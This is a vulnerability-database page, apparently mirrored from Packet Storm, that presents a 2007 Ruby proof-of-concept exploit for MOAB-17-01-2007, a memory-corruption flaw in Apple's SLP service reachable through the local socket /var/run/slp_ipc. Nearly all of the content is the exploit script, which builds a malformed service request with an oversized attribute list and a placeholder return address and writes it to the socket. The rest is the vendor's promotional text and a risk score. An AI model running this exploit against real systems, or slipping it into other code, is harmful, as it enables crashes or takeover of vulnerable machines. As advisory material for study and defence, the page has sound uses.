Lucene search

K

MOAB-17-01-2007.rb.txt

🗓️ 20 Jan 2007 00:00:00Reported by Kevin FinisterreType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Proof of concept for MOAB-17-01-2007, UNIX socket exploi

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/ruby  
# (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com>  
# Kevin Finisterre <kf_lists [at] digitalmunition.com>  
# All pwnage reserved.  
#  
# Proof of concept for MOAB-17-01-2007  
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html  
#  
# Originally reported to Apple by Kevin, on 08/02/2006.  
  
require 'socket'  
  
target_path = (ARGV[0] || '/var/run/slp_ipc')  
slp_socket = UNIXSocket.open(target_path)  
  
payload = ("\x58" * 506)  
payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398)  
  
stream = "\x01" + # SrvRqst = 1  
"\x00\x13" + # Length of remaining fields? (up to attr-list)  
"\x04\x00\x00\x00\x00\x00\x00" +  
"\x00\x02\x00\x00" + # length of scope-list string  
"\x78\x78" + # <scope-list>  
"\xff\x03\x00\x00" + # length of attr-list string 0x3ff = 1023 in hex.  
(payload) # <attr-list>  
  
slp_socket.write stream  
slp_socket.close`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
20
.json
Report